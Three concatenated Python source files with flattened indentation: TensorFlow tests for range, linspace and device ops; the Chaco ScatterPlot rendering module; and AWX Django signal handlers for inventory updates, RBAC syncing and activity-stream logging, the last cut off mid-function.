def testRandomWalk(self):
# Fully known shape.
rnd1 = init_ops._random_walk([1, 2], tf.nn.relu)
self.assertEqual([1, 2], rnd1.get_shape())
# TODO(vrv): move to sequence_ops_test?
class RangeTest(tf.test.TestCase):
def _Range(self, start, limit, delta):
with self.test_session():
tf_ans = tf.range(start, limit, delta, name="range")
self.assertEqual([len(range(start, limit, delta))], tf_ans.get_shape())
return tf_ans.eval()
def testBasic(self):
self.assertTrue(np.array_equal(
self._Range(0, 5, 1), np.array([0, 1, 2, 3, 4])))
self.assertTrue(np.array_equal(
self._Range(0, 5, 2), np.array([0, 2, 4])))
self.assertTrue(np.array_equal(
self._Range(0, 6, 2), np.array([0, 2, 4])))
self.assertTrue(np.array_equal(
self._Range(13, 32, 7), np.array([13, 20, 27])))
self.assertTrue(np.array_equal(
self._Range(100, 500, 100), np.array([100, 200, 300, 400])))
self.assertEqual(tf.range(0, 5, 1).dtype, tf.int32)
def testLimitOnly(self):
with self.test_session():
self.assertAllEqual(np.arange(5), tf.range(5).eval())
def testEmpty(self):
for start in 0, 5:
self.assertTrue(np.array_equal(self._Range(start, start, 1), []))
# TODO(vrv): move to sequence_ops_test?
class LinSpaceTest(tf.test.TestCase):
def _LinSpace(self, start, stop, num):
with self.test_session():
tf_ans = tf.linspace(start, stop, num, name="linspace")
self.assertEqual([num], tf_ans.get_shape())
return tf_ans.eval()
def testPositive(self):
self.assertArrayNear(self._LinSpace(1., 5., 1), np.array([1.]), 1e-5)
self.assertArrayNear(self._LinSpace(1., 5., 2), np.array([1., 5.]), 1e-5)
self.assertArrayNear(self._LinSpace(1., 5., 3),
np.array([1., 3., 5.]), 1e-5)
self.assertArrayNear(self._LinSpace(1., 5., 4),
np.array([1., 7. / 3., 11. / 3., 5.]), 1e-5)
def testNegative(self):
self.assertArrayNear(self._LinSpace(-1., -5., 1), np.array([-1.]), 1e-5)
self.assertArrayNear(self._LinSpace(-1., -5., 2),
np.array([-1., -5.]), 1e-5)
self.assertArrayNear(self._LinSpace(-1., -5., 3),
np.array([-1., -3., -5.]), 1e-5)
self.assertArrayNear(self._LinSpace(-1., -5., 4),
np.array([-1., -7. / 3., -11. / 3., -5.]), 1e-5)
def testNegativeToPositive(self):
self.assertArrayNear(self._LinSpace(-1., 5., 1), np.array([-1.]), 1e-5)
self.assertArrayNear(self._LinSpace(-1., 5., 2), np.array([-1., 5.]), 1e-5)
self.assertArrayNear(self._LinSpace(-1., 5., 3),
np.array([-1., 2., 5.]), 1e-5)
self.assertArrayNear(self._LinSpace(-1., 5., 4),
np.array([-1., 1., 3., 5.]), 1e-5)
def testPoint(self):
self.assertArrayNear(self._LinSpace(5., 5., 1), np.array([5.]), 1e-5)
self.assertArrayNear(self._LinSpace(5., 5., 2), np.array([5.] * 2), 1e-5)
self.assertArrayNear(self._LinSpace(5., 5., 3), np.array([5.] * 3), 1e-5)
self.assertArrayNear(self._LinSpace(5., 5., 4), np.array([5.] * 4), 1e-5)
class DeviceTest(tf.test.TestCase):
def testNoDevice(self):
with tf.Graph().as_default():
var = tf.Variable([[1.0, 1.0]])
self.assertEqual(None, var.device)
self.assertEqual(None, var.initializer.device)
def testDevice(self):
with tf.Graph().as_default():
with tf.device("/job:ps"):
var = tf.Variable([[1.0, 1.0]])
self.assertEqual("/job:ps", var.device)
self.assertEqual("/job:ps", var.initializer.device)
if __name__ == "__main__":
tf.test.main()
|
|
""" Defines the ScatterPlot class, and associated Traits UI view and helper
function.
"""
# Standard library imports
import itertools
# Major library imports
from numpy import around, array, asarray, column_stack, \
isfinite, isnan, nanargmin, ndarray, sqrt, sum, transpose, where
# Enthought library imports
from enable.api import black_color_trait, ColorTrait, AbstractMarker, \
CustomMarker, MarkerNameDict, MarkerTrait
from kiva.constants import STROKE
from traits.api import Any, Array, Bool, Float, Trait, Callable, Property, \
Tuple, Either, cached_property
from traitsui.api import View, VGroup, Item
# Local relative imports
from base_xy_plot import BaseXYPlot
from speedups import scatterplot_gather_points
from base import reverse_map_1d
#------------------------------------------------------------------------------
# Traits UI View for customizing a scatter plot.
#------------------------------------------------------------------------------
class ScatterPlotView(View):
""" Traits UI View for customizing a scatter plot.
"""
def __init__(self):
vgroup = VGroup(
Item("marker", label="Marker type"),
Item("marker_size", label="Size"),
Item("color", label="Color", style="custom"),
)
super(ScatterPlotView, self).__init__(vgroup)
self.buttons = ["OK", "Cancel"]
#------------------------------------------------------------------------------
# Helper functions for scatterplot rendering
#------------------------------------------------------------------------------
def render_markers(gc, points, marker, marker_size,
color, line_width, outline_color,
custom_symbol=None, debug=False, point_mask=None):
""" Helper function for a PlotComponent instance to render a
set of (x,y) points onto a graphics context. Currently, it makes some
assumptions about the attributes on the plot object; these may be factored
out eventually.
Parameters
----------
gc : GraphicsContext
The target for rendering the points
points : array of (x,y) points
The points to render
marker : string, class, or instance
The type of marker to use for the points
marker_size : number
The size of the markers
color : RGB(A) color
The color of the markers
line_width : number
The width, in pixels, of the marker outline
outline_color : RGB(A) color
The color of the marker outline
custom_symbol : CompiledPath
If the marker style is 'custom', this is the symbol
point_mask : array of bools
The mask specifying which points need to be rendered. The `points`
array is already masked
"""
if len(points) == 0:
return
# marker can be string, class, or instance
if isinstance(marker, basestring):
marker = MarkerNameDict[marker]()
elif issubclass(marker, AbstractMarker):
marker = marker()
with gc:
gc.set_line_dash(None)
if marker.draw_mode == STROKE:
# markers with the STROKE draw mode will not be visible
# if the line width is zero, so set it to 1
if line_width == 0:
line_width = 1.0
gc.set_stroke_color(color)
gc.set_line_width(line_width)
else:
gc.set_stroke_color(outline_color)
gc.set_line_width(line_width)
gc.set_fill_color(color)
gc.begin_path()
        # Try the optimized routines, fastest first, if there is a single
        # marker size and the GC supports them; otherwise fall through to
        # the per-point loop below.
if not isinstance(marker_size, ndarray):
# try fastest routine
if not isinstance(marker, CustomMarker):
# get fast renderer, or dummy if not implemented
renderer = getattr(gc, 'draw_marker_at_points', lambda *a: 0)
result = renderer(points, marker_size, marker.kiva_marker)
# it worked, we're done
if result != 0:
return
# try next fastest routine
if hasattr(gc, 'draw_path_at_points'):
if not isinstance(marker, CustomMarker):
path = gc.get_empty_path()
marker.add_to_path(path, marker_size)
mode = marker.draw_mode
else:
path = custom_symbol
mode = STROKE
if not marker.antialias:
gc.set_antialias(False)
gc.draw_path_at_points(points, path, mode)
return
if isinstance(marker_size, ndarray):
if point_mask is not None:
marker_size = marker_size[point_mask]
else:
marker_size = itertools.repeat(marker_size)
if not marker.antialias:
gc.set_antialias(False)
if not isinstance(marker, CustomMarker):
for pt,size in itertools.izip(points, marker_size):
sx, sy = pt
with gc:
gc.translate_ctm(sx, sy)
# Kiva GCs have a path-drawing interface
marker.add_to_path(gc, size)
gc.draw_path(marker.draw_mode)
else:
path = custom_symbol
for pt,size in itertools.izip(points, marker_size):
sx, sy = pt
with gc:
gc.translate_ctm(sx, sy)
gc.scale_ctm(size, size)
gc.add_path(path)
gc.draw_path(STROKE)
return
#------------------------------------------------------------------------------
# The scatter plot
#------------------------------------------------------------------------------
class ScatterPlot(BaseXYPlot):
"""
Renders a scatter plot, given an index and value arrays.
"""
# The CompiledPath to use if **marker** is set to "custom". This attribute
# must be a compiled path for the Kiva context onto which this plot will
# be rendered. Usually, importing kiva.GraphicsContext will do
# the right thing.
custom_symbol = Any
#------------------------------------------------------------------------
# Styles on a ScatterPlot
#------------------------------------------------------------------------
# The type of marker to use. This is a mapped trait using strings as the
# keys.
marker = MarkerTrait
# The pixel size of the markers, not including the thickness of the outline.
# Default value is 4.0.
# TODO: for consistency, there should be a size data source and a mapper
marker_size = Either(Float, Array)
# The function which actually renders the markers
render_markers_func = Callable(render_markers)
# The thickness, in pixels, of the outline to draw around the marker. If
# this is 0, no outline is drawn.
line_width = Float(1.0)
# The fill color of the marker.
color = black_color_trait
# The color of the outline to draw around the marker.
outline_color = black_color_trait
# The RGBA tuple for rendering lines. It is always a tuple of length 4.
# It has the same RGB values as color_, and its alpha value is the alpha
# value of self.color multiplied by self.alpha.
effective_color = Property(Tuple, depends_on=['color', 'alpha'])
# The RGBA tuple for rendering the fill. It is always a tuple of length 4.
# It has the same RGB values as outline_color_, and its alpha value is the
# alpha value of self.outline_color multiplied by self.alpha.
effective_outline_color = Property(Tuple, depends_on=['outline_color', 'alpha'])
# Traits UI View for customizing the plot.
traits_view = ScatterPlotView()
#------------------------------------------------------------------------
# Selection and selection rendering
    # A selection on the plot is indicated by setting the index or value
# datasource's 'selections' metadata item to a list of indices, or the
# 'selection_mask' metadata to a boolean array of the same length as the
# datasource.
#------------------------------------------------------------------------
show_selection = Bool(True)
selection_marker = MarkerTrait
selection_marker_size = Float(4.0)
selection_line_width = Float(1.0)
selection_color = ColorTrait("yellow")
selection_outline_color = black_color_trait
#------------------------------------------------------------------------
# Private traits
#------------------------------------------------------------------------
_cached_selected_pts = Trait(None, None, Array)
_cached_selected_screen_pts = Array
_cached_point_mask = Array
_cached_selection_point_mask = Array
_selection_cache_valid = Bool(False)
#------------------------------------------------------------------------
# Overridden PlotRenderer methods
#------------------------------------------------------------------------
def map_screen(self, data_array):
""" Maps an array of data points into screen space and returns it as
an array.
Implements the AbstractPlotRenderer interface.
"""
# data_array is Nx2 array
if len(data_array) == 0:
return []
data_array = asarray(data_array)
if len(data_array.shape) == 1:
x_ary = data_array[0]
y_ary = data_array[1]
else:
x_ary = data_array[:, 0]
y_ary = data_array[:, 1]
sx = self.index_mapper.map_screen(x_ary)
sy = self.value_mapper.map_screen(y_ary)
if self.orientation == "h":
return column_stack([sx, sy])
else:
return column_stack([sy, sx])
def map_data(self, screen_pt, all_values=True):
""" Maps a screen space point into the "index" space of the plot.
Overrides the BaseXYPlot implementation, and always returns an
array of (index, value) tuples.
"""
x, y = screen_pt
if self.orientation == 'v':
x, y = y, x
return array((self.index_mapper.map_data(x),
self.value_mapper.map_data(y)))
def map_index(self, screen_pt, threshold=0.0, outside_returns_none=True, \
index_only = False):
""" Maps a screen space point to an index into the plot's index array(s).
        Overrides the BaseXYPlot implementation.
"""
index_data = self.index.get_data()
value_data = self.value.get_data()
if len(value_data) == 0 or len(index_data) == 0:
return None
if index_only and self.index.sort_order != "none":
data_pt = self.map_data(screen_pt)[0]
# The rest of this was copied out of BaseXYPlot.
            # We can't just use BaseXYPlot.map_index because
            # it expects map_data to return a scalar, not an (index, value) pair.
if ((data_pt < self.index_mapper.range.low) or \
(data_pt > self.index_mapper.range.high)) and outside_returns_none:
return None
try:
ndx = reverse_map_1d(index_data, data_pt, self.index.sort_order)
except IndexError, e:
# if reverse_map raises this exception, it means that data_pt is
# outside the range of values in index_data.
if outside_returns_none:
return None
else:
if data_pt < index_data[0]:
return 0
else:
return len(index_data) - 1
if threshold == 0.0:
# Don't do any threshold testing
return ndx
x = index_data[ndx]
y = value_data[ndx]
if isnan(x) or isnan(y):
return None
sx, sy = self.map_screen([x,y])
if ((threshold == 0.0) or (screen_pt[0]-sx) < threshold):
return ndx
else:
return None
else:
# Brute force implementation
all_data = transpose(array([index_data, value_data]))
screen_points = around(self.map_screen(all_data))
if len(screen_points) == 0:
return None
if index_only:
distances = abs(screen_points[:,0] - screen_pt[0])
else:
delta = screen_points - array([screen_pt])
distances = sqrt(sum(delta*delta, axis=1))
closest_ndx = nanargmin(distances)
if distances[closest_ndx] <= threshold:
return closest_ndx
else:
return None
#------------------------------------------------------------------------
# Private methods; implements the BaseXYPlot stub methods
#------------------------------------------------------------------------
def _gather_points_old(self):
"""
Collects the data points that are within the bounds of the plot and
caches them
"""
if self._cache_valid and self._selection_cache_valid:
return
if not self.index or not self.value:
return
index, index_mask = self.index.get_data_mask()
value, value_mask = self.value.get_data_mask()
if len(index) == 0 or len(value) == 0 or len(index) != len(value):
self._cached_data_pts = []
self._cached_point_mask = []
self._cache_valid = True
return
index_range_mask = self.index_mapper.range.mask_data(index)
value_range_mask = self.value_mapper.range.mask_data(value)
nan_mask = (isfinite(index) & index_mask &
isfinite(value) & value_mask)
point_mask = nan_mask & index_range_mask & value_range_mask
if not self._cache_valid:
if not point_mask.all():
points = column_stack([index[point_mask], value[point_mask]])
else:
points = column_stack([index, value])
self._cached_data_pts = points
self._cached_point_mask = point_mask
self._cache_valid = True
if not self._selection_cache_valid:
indices = None
# Check both datasources for metadata
# XXX: Only one is used, and if both are defined, then self.index
            # happens to take precedence. Perhaps this should be more
# structured? Hopefully, when we create the Selection objects,
# we'll have to define a small algebra about how they are combined,
# and this will fall out...
point_mask = point_mask.copy()
for ds in (self.index, self.value):
if ds.metadata.get('selection_masks', None) is not None:
try:
for mask in ds.metadata['selection_masks']:
point_mask &= mask
indices = where(point_mask == True)
points = column_stack([index[indices], value[indices]])
except:
continue
elif ds.metadata.get('selections', None) is not None:
try:
indices = ds.metadata['selections']
point_mask = point_mask[indices]
points = column_stack([index[indices], value[indices]])
except:
continue
else:
continue
self._cached_selection_point_mask = point_mask
self._cached_selected_pts = points
self._selection_cache_valid = True
break
else:
self._cached_selected_pts = None
self._selection_cache_valid = True
return
def _gather_points_fast(self):
if self._cache_valid and self._selection_cache_valid:
return
if not self.index or not self.value:
return
index, index_mask = self.index.get_data_mask()
value, value_mask = self.value.get_data_mask()
index_range = self.index_mapper.range
value_range = self.value_mapper.range
kw = {}
for axis in ("index", "value"):
ds = getattr(self, axis)
if ds.metadata.get('selections', None) is not None:
kw[axis + "_sel"] = ds.metadata['selections']
if ds.metadata.get('selection_mask', None) is not None:
kw[axis + "_sel_mask"] = ds.metadata['selection_mask']
points, selections = scatterplot_gather_points(index, index_range.low, index_range.high,
value, value_range.low, value_range.high,
index_mask = index_mask,
value_mask = value_mask,
**kw)
if not self._cache_valid:
self._cached_data_pts = points
self._cache_valid = True
if not self._selection_cache_valid:
if selections is not None and len(selections) > 0:
self._cached_selected_pts = points[selections]
self._selection_cache_valid = True
else:
self._cached_selected_pts = None
self._selection_cache_valid = True
def _gather_points(self):
#self._gather_points_fast()
self._gather_points_old()
def _render(self, gc, points, icon_mode=False):
"""
This same method is used both to render the scatterplot and to
draw just the iconified version of this plot, with the latter
simply requiring that a few steps be skipped.
"""
if not icon_mode:
gc.save_state()
gc.clip_to_rect(self.x, self.y, self.width, self.height)
self.render_markers_func(gc, points, self.marker, self.marker_size,
self.effective_color, self.line_width, self.effective_outline_color,
self.custom_symbol, point_mask=self._cached_point_mask)
if self._cached_selected_pts is not None and len(self._cached_selected_pts) > 0:
sel_pts = self.map_screen(self._cached_selected_pts)
self.render_markers_func(gc, sel_pts, self.selection_marker,
self.selection_marker_size, self.selection_color_,
self.selection_line_width, self.selection_outline_color_,
self.custom_symbol, point_mask=self._cached_point_mask)
if not icon_mode:
# Draw the default axes, if necessary
self._draw_default_axes(gc)
gc.restore_state()
def _render_icon(self, gc, x, y, width, height):
point = array([x+width/2, y+height/2])
self._render(gc, [point], icon_mode=True)
return
#------------------------------------------------------------------------
# Event handlers
#------------------------------------------------------------------------
def _alpha_changed(self):
self.invalidate_draw()
self.request_redraw()
def _marker_changed(self):
self.invalidate_draw()
self.request_redraw()
def _marker_size_changed(self):
self.invalidate_draw()
self.request_redraw()
def _line_width_changed(self):
self.invalidate_draw()
self.request_redraw()
def _color_changed(self):
self.invalidate_draw()
self.request_redraw()
def _outline_color_changed(self):
self.invalidate_draw()
self.request_redraw()
def _either_metadata_changed(self):
if self.show_selection:
# Only redraw when we are showing the selection. Otherwise, there
# is nothing to update in response to this event.
self._selection_cache_valid = False
self.invalidate_draw()
self.request_redraw()
#------------------------------------------------------------------------
# Defaults
#------------------------------------------------------------------------
def _marker_size_default(self):
return 4.0
#------------------------------------------------------------------------
# Properties
#------------------------------------------------------------------------
@cached_property
def _get_effective_color(self):
if len(self.color_) == 4:
edge_alpha = self.color_[-1]
else:
edge_alpha = 1.0
c = self.color_[:3] + (edge_alpha * self.alpha,)
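        # e.g. color_ == (1.0, 0.0, 0.0, 0.5) with self.alpha == 0.4 yields (1.0, 0.0, 0.0, 0.2)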
return c
@cached_property
def _get_effective_outline_color(self):
if len(self.outline_color_) == 4:
edge_alpha = self.outline_color_[-1]
else:
edge_alpha = 1.0
c = self.outline_color_[:3] + (edge_alpha * self.alpha,)
return c
# EOF
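# A minimal construction sketch, kept as a comment; it assumes the usual Chaco
# helpers (ArrayDataSource, DataRange1D, LinearMapper from chaco.api) and is
# illustrative rather than part of this module:
#
#     from numpy import linspace, sin
#     from chaco.api import ArrayDataSource, DataRange1D, LinearMapper
#
#     x = linspace(0.0, 10.0, 50)
#     index = ArrayDataSource(x)
#     value = ArrayDataSource(sin(x))
#     scatter = ScatterPlot(index=index, value=value,
#                           index_mapper=LinearMapper(range=DataRange1D(index)),
#                           value_mapper=LinearMapper(range=DataRange1D(value)),
#                           marker="circle", marker_size=4.0, color="blue")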
|
|
# Copyright (c) 2015 Ansible, Inc.
# All Rights Reserved.
# Python
import contextlib
import logging
import threading
import json
import sys
# Django
from django.db import connection
from django.conf import settings
from django.db.models.signals import (
pre_save,
post_save,
pre_delete,
post_delete,
m2m_changed,
)
from django.dispatch import receiver
from django.contrib.auth import SESSION_KEY
from django.contrib.sessions.models import Session
from django.utils import timezone
# Django-CRUM
from crum import get_current_request, get_current_user
from crum.signals import current_user_getter
# AWX
from awx.main.models import (
ActivityStream, Group, Host, InstanceGroup, Inventory, InventorySource,
Job, JobHostSummary, JobTemplate, OAuth2AccessToken, Organization, Project,
Role, SystemJob, SystemJobTemplate, UnifiedJob, UnifiedJobTemplate, User,
UserSessionMembership, WorkflowJobTemplateNode, WorkflowApproval,
WorkflowApprovalTemplate, ROLE_SINGLETON_SYSTEM_ADMINISTRATOR
)
from awx.main.constants import CENSOR_VALUE
from awx.main.utils import model_instance_diff, model_to_dict, camelcase_to_underscore, get_current_apps
from awx.main.utils import ignore_inventory_computed_fields, ignore_inventory_group_removal, _inventory_updates
from awx.main.tasks import update_inventory_computed_fields
from awx.main.fields import (
is_implicit_parent,
update_role_parentage_for_instance,
)
from awx.main import consumers
from awx.conf.utils import conf_to_dict
__all__ = []
logger = logging.getLogger('awx.main.signals')
analytics_logger = logging.getLogger('awx.analytics.activity_stream')
# Update has_active_failures for inventory/groups when a Host/Group is deleted,
# when a Host-Group or Group-Group relationship is updated, or when a Job is deleted
def get_activity_stream_class():
if 'migrate' in sys.argv:
return get_current_apps().get_model('main', 'ActivityStream')
else:
return ActivityStream
def get_current_user_or_none():
u = get_current_user()
if not isinstance(u, User):
return None
return u
def emit_update_inventory_on_created_or_deleted(sender, **kwargs):
if getattr(_inventory_updates, 'is_updating', False):
return
instance = kwargs['instance']
if ('created' in kwargs and kwargs['created']) or \
kwargs['signal'] == post_delete:
pass
else:
return
sender_name = str(sender._meta.verbose_name)
logger.debug("%s created or deleted, updating inventory computed fields: %r %r",
sender_name, sender, kwargs)
try:
inventory = instance.inventory
except Inventory.DoesNotExist:
pass
else:
if inventory is not None:
connection.on_commit(
lambda: update_inventory_computed_fields.delay(inventory.id)
)
def rebuild_role_ancestor_list(reverse, model, instance, pk_set, action, **kwargs):
'When a role parent is added or removed, update our role hierarchy list'
if action == 'post_add':
if reverse:
model.rebuild_role_ancestor_list(list(pk_set), [])
else:
model.rebuild_role_ancestor_list([instance.id], [])
if action in ['post_remove', 'post_clear']:
if reverse:
model.rebuild_role_ancestor_list([], list(pk_set))
else:
model.rebuild_role_ancestor_list([], [instance.id])
def sync_superuser_status_to_rbac(instance, **kwargs):
    'When the is_superuser flag is changed on a user, reflect that in the membership of the System Administrator role'
update_fields = kwargs.get('update_fields', None)
if update_fields and 'is_superuser' not in update_fields:
return
if instance.is_superuser:
Role.singleton(ROLE_SINGLETON_SYSTEM_ADMINISTRATOR).members.add(instance)
else:
Role.singleton(ROLE_SINGLETON_SYSTEM_ADMINISTRATOR).members.remove(instance)
def rbac_activity_stream(instance, sender, **kwargs):
# Only if we are associating/disassociating
if kwargs['action'] in ['pre_add', 'pre_remove']:
if hasattr(instance, 'content_type'): # Duck typing, migration-independent isinstance(instance, Role)
if instance.content_type_id is None and instance.singleton_name == ROLE_SINGLETON_SYSTEM_ADMINISTRATOR:
# Skip entries for the system admin role because user serializer covers it
# System auditor role is shown in the serializer, but its relationship is
# managed separately, its value is incorrect, and a correction entry is needed
return
            # This juggles which role to use, because the association could be A->B or B->A
if sender.__name__ == 'Role_parents':
role = kwargs['model'].objects.filter(pk__in=kwargs['pk_set']).first()
# don't record implicit creation / parents in activity stream
if role is not None and is_implicit_parent(parent_role=role, child_role=instance):
return
else:
role = instance
# If a singleton role is the instance, the singleton role is acted on
# otherwise the related object is considered to be acted on
if instance.content_object:
instance = instance.content_object
else:
# Association with actor, like role->user
role = kwargs['model'].objects.filter(pk__in=kwargs['pk_set']).first()
activity_stream_associate(sender, instance, role=role, **kwargs)
def cleanup_detached_labels_on_deleted_parent(sender, instance, **kwargs):
for label in instance.labels.all():
if label.is_candidate_for_detach():
label.delete()
def save_related_job_templates(sender, instance, **kwargs):
'''save_related_job_templates loops through all of the
    job templates that use an Inventory whose Organization has been
    updated. This triggers a rebuild of the RBAC hierarchy
and ensures the proper access restrictions.
'''
if sender is not Inventory:
raise ValueError('This signal callback is only intended for use with Project or Inventory')
update_fields = kwargs.get('update_fields', None)
if ((update_fields and not ('organization' in update_fields or 'organization_id' in update_fields)) or
kwargs.get('created', False)):
return
if instance._prior_values_store.get('organization_id') != instance.organization_id:
jtq = JobTemplate.objects.filter(**{sender.__name__.lower(): instance})
for jt in jtq:
parents_added, parents_removed = update_role_parentage_for_instance(jt)
if parents_added or parents_removed:
logger.info('Permissions on JT {} changed due to inventory {} organization change from {} to {}.'.format(
jt.pk, instance.pk, instance._prior_values_store.get('organization_id'), instance.organization_id
))
def connect_computed_field_signals():
post_save.connect(emit_update_inventory_on_created_or_deleted, sender=Host)
post_delete.connect(emit_update_inventory_on_created_or_deleted, sender=Host)
post_save.connect(emit_update_inventory_on_created_or_deleted, sender=Group)
post_delete.connect(emit_update_inventory_on_created_or_deleted, sender=Group)
post_save.connect(emit_update_inventory_on_created_or_deleted, sender=InventorySource)
post_delete.connect(emit_update_inventory_on_created_or_deleted, sender=InventorySource)
post_save.connect(emit_update_inventory_on_created_or_deleted, sender=Job)
post_delete.connect(emit_update_inventory_on_created_or_deleted, sender=Job)
connect_computed_field_signals()
post_save.connect(save_related_job_templates, sender=Inventory)
m2m_changed.connect(rebuild_role_ancestor_list, Role.parents.through)
m2m_changed.connect(rbac_activity_stream, Role.members.through)
m2m_changed.connect(rbac_activity_stream, Role.parents.through)
post_save.connect(sync_superuser_status_to_rbac, sender=User)
pre_delete.connect(cleanup_detached_labels_on_deleted_parent, sender=UnifiedJob)
pre_delete.connect(cleanup_detached_labels_on_deleted_parent, sender=UnifiedJobTemplate)
# Migrate hosts, groups to parent group(s) whenever a group is deleted
@receiver(pre_delete, sender=Group)
def save_related_pks_before_group_delete(sender, **kwargs):
if getattr(_inventory_updates, 'is_removing', False):
return
instance = kwargs['instance']
instance._saved_inventory_pk = instance.inventory.pk
instance._saved_parents_pks = set(instance.parents.values_list('pk', flat=True))
instance._saved_hosts_pks = set(instance.hosts.values_list('pk', flat=True))
instance._saved_children_pks = set(instance.children.values_list('pk', flat=True))
@receiver(post_delete, sender=Group)
def migrate_children_from_deleted_group_to_parent_groups(sender, **kwargs):
if getattr(_inventory_updates, 'is_removing', False):
return
instance = kwargs['instance']
parents_pks = getattr(instance, '_saved_parents_pks', [])
hosts_pks = getattr(instance, '_saved_hosts_pks', [])
children_pks = getattr(instance, '_saved_children_pks', [])
is_updating = getattr(_inventory_updates, 'is_updating', False)
with ignore_inventory_group_removal():
with ignore_inventory_computed_fields():
if parents_pks:
for parent_group in Group.objects.filter(pk__in=parents_pks):
for child_host in Host.objects.filter(pk__in=hosts_pks):
logger.debug('adding host %s to parent %s after group deletion',
child_host, parent_group)
parent_group.hosts.add(child_host)
for child_group in Group.objects.filter(pk__in=children_pks):
logger.debug('adding group %s to parent %s after group deletion',
child_group, parent_group)
parent_group.children.add(child_group)
inventory_pk = getattr(instance, '_saved_inventory_pk', None)
if inventory_pk and not is_updating:
try:
inventory = Inventory.objects.get(pk=inventory_pk)
inventory.update_computed_fields()
except (Inventory.DoesNotExist, Project.DoesNotExist):
pass
# Update host pointers to last_job and last_job_host_summary when a job is deleted
def _update_host_last_jhs(host):
jhs_qs = JobHostSummary.objects.filter(host__pk=host.pk)
try:
jhs = jhs_qs.order_by('-job__pk')[0]
except IndexError:
jhs = None
update_fields = []
try:
last_job = jhs.job if jhs else None
except Job.DoesNotExist:
# The job (and its summaries) have already been/are currently being
# deleted, so there's no need to update the host w/ a reference to it
return
if host.last_job != last_job:
host.last_job = last_job
update_fields.append('last_job')
if host.last_job_host_summary != jhs:
host.last_job_host_summary = jhs
update_fields.append('last_job_host_summary')
if update_fields:
host.save(update_fields=update_fields)
@receiver(pre_delete, sender=Job)
def save_host_pks_before_job_delete(sender, **kwargs):
instance = kwargs['instance']
    hosts_qs = Host.objects.filter(last_job__pk=instance.pk)
instance._saved_hosts_pks = set(hosts_qs.values_list('pk', flat=True))
@receiver(post_delete, sender=Job)
def update_host_last_job_after_job_deleted(sender, **kwargs):
instance = kwargs['instance']
hosts_pks = getattr(instance, '_saved_hosts_pks', [])
for host in Host.objects.filter(pk__in=hosts_pks):
_update_host_last_jhs(host)
# Set via ActivityStreamRegistrar to record activity stream events
class ActivityStreamEnabled(threading.local):
def __init__(self):
self.enabled = True
def __bool__(self):
return bool(self.enabled and getattr(settings, 'ACTIVITY_STREAM_ENABLED', True))
activity_stream_enabled = ActivityStreamEnabled()
@contextlib.contextmanager
def disable_activity_stream():
'''
Context manager to disable capturing activity stream changes.
'''
try:
previous_value = activity_stream_enabled.enabled
activity_stream_enabled.enabled = False
yield
finally:
activity_stream_enabled.enabled = previous_value
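# Usage sketch (illustrative): suppress activity stream entries for a block of
# bulk changes.
#
#     with disable_activity_stream():
#         for host in hosts:
#             host.save()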
@contextlib.contextmanager
def disable_computed_fields():
post_save.disconnect(emit_update_inventory_on_created_or_deleted, sender=Host)
post_delete.disconnect(emit_update_inventory_on_created_or_deleted, sender=Host)
post_save.disconnect(emit_update_inventory_on_created_or_deleted, sender=Group)
post_delete.disconnect(emit_update_inventory_on_created_or_deleted, sender=Group)
post_save.disconnect(emit_update_inventory_on_created_or_deleted, sender=InventorySource)
post_delete.disconnect(emit_update_inventory_on_created_or_deleted, sender=InventorySource)
post_save.disconnect(emit_update_inventory_on_created_or_deleted, sender=Job)
post_delete.disconnect(emit_update_inventory_on_created_or_deleted, sender=Job)
yield
connect_computed_field_signals()
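# Usage sketch (illustrative; import_hosts_and_groups is a hypothetical helper):
# disconnect the computed-field signal handlers during a bulk import so the
# inventory totals are recalculated only once afterwards.
#
#     with disable_computed_fields():
#         import_hosts_and_groups(inventory)
#     inventory.update_computed_fields()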
def model_serializer_mapping():
from awx.api import serializers
from awx.main import models
from awx.conf.models import Setting
from awx.conf.serializers import SettingSerializer
return {
Setting: SettingSerializer,
models.User: serializers.UserActivityStreamSerializer,
models.Organization: serializers.OrganizationSerializer,
models.Inventory: serializers.InventorySerializer,
models.Host: serializers.HostSerializer,
models.Group: serializers.GroupSerializer,
models.InstanceGroup: serializers.InstanceGroupSerializer,
models.InventorySource: serializers.InventorySourceSerializer,
models.CustomInventoryScript: serializers.CustomInventoryScriptSerializer,
models.Credential: serializers.CredentialSerializer,
models.Team: serializers.TeamSerializer,
models.Project: serializers.ProjectSerializer,
models.JobTemplate: serializers.JobTemplateWithSpecSerializer,
models.Job: serializers.JobSerializer,
models.AdHocCommand: serializers.AdHocCommandSerializer,
models.NotificationTemplate: serializers.NotificationTemplateSerializer,
models.Notification: serializers.NotificationSerializer,
models.CredentialType: serializers.CredentialTypeSerializer,
models.Schedule: serializers.ScheduleSerializer,
models.Label: serializers.LabelSerializer,
models.WorkflowJobTemplate: serializers.WorkflowJobTemplateWithSpecSerializer,
models.WorkflowJobTemplateNode: serializers.WorkflowJobTemplateNodeSerializer,
models.WorkflowApproval: serializers.WorkflowApprovalActivityStreamSerializer,
models.WorkflowApprovalTemplate: serializers.WorkflowApprovalTemplateSerializer,
models.WorkflowJob: serializers.WorkflowJobSerializer,
models.OAuth2AccessToken: serializers.OAuth2TokenSerializer,
models.OAuth2Application: serializers.OAuth2ApplicationSerializer,
}
def emit_activity_stream_change(instance):
if 'migrate' in sys.argv:
# don't emit activity stream external logs during migrations, it
# could be really noisy
return
from awx.api.serializers import ActivityStreamSerializer
actor = None
if instance.actor:
actor = instance.actor.username
summary_fields = ActivityStreamSerializer(instance).get_summary_fields(instance)
analytics_logger.info('Activity Stream update entry for %s' % str(instance.object1),
extra=dict(changes=instance.changes, relationship=instance.object_relationship_type,
actor=actor, operation=instance.operation,
object1=instance.object1, object2=instance.object2, summary_fields=summary_fields))
def activity_stream_create(sender, instance, created, **kwargs):
if created and activity_stream_enabled:
_type = type(instance)
if getattr(_type, '_deferred', False):
return
object1 = camelcase_to_underscore(instance.__class__.__name__)
changes = model_to_dict(instance, model_serializer_mapping())
# Special case where Job survey password variables need to be hidden
if type(instance) == Job:
changes['credentials'] = [
'{} ({})'.format(c.name, c.id)
for c in instance.credentials.iterator()
]
changes['labels'] = [label.name for label in instance.labels.iterator()]
if 'extra_vars' in changes:
changes['extra_vars'] = instance.display_extra_vars()
if type(instance) == OAuth2AccessToken:
changes['token'] = CENSOR_VALUE
activity_entry = get_activity_stream_class()(
operation='create',
object1=object1,
changes=json.dumps(changes),
actor=get_current_user_or_none())
#TODO: Weird situation where cascade SETNULL doesn't work
# it might actually be a good idea to remove all of these FK references since
# we don't really use them anyway.
if instance._meta.model_name != 'setting': # Is not conf.Setting instance
activity_entry.save()
getattr(activity_entry, object1).add(instance.pk)
else:
